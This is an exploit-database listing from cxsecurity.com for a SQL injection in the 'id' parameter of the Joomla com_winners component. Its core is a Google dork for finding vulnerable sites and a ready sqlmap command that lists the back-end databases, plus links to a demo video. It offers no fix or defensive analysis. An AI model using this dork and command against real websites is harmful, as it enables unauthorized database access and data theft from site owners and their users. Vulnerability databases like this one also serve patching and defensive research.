Joomla com_winners - 'id' Parameter SQL Injection

2017.04.08
ir Shahab Shamsi (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/index.php?option=com_winners

Information: ===================================== [-] Title : Joomla com_winners - 'id' Parameter SQL Injection [-] Author : Shahab Shamsi [-] Contact Me : SecurityMan.Org [-] Vendor : http://joomla.org/ [-] Category : Web Application [-] Date : 07.April.2017 [-] Tested On : SQLMap Google Dork: ===================================== inurl:/index.php?option=com_winners Exploit: ====================================== >sqlmap.py -u "http://site/index.php?option=com_winners&view=winner_detail&id=[SQL]6&Itemid=683&lang=en" -p id --dbs Video : ====================================== https://www.youtube.com/watch?v=J9TsSe80B28 http://securityman.org/joomla-com_winners-id-parameter-sql-injection/

References:

https://www.youtube.com/watch?v=J9TsSe80B28
http://securityman.org/joomla-com_winners-id-parameter-sql-injection/


See this note in RAW Version
Vote for this issue:
50%
50%

Comment it here.
Copyright 2025, cxsecurity.com

 

Back to Top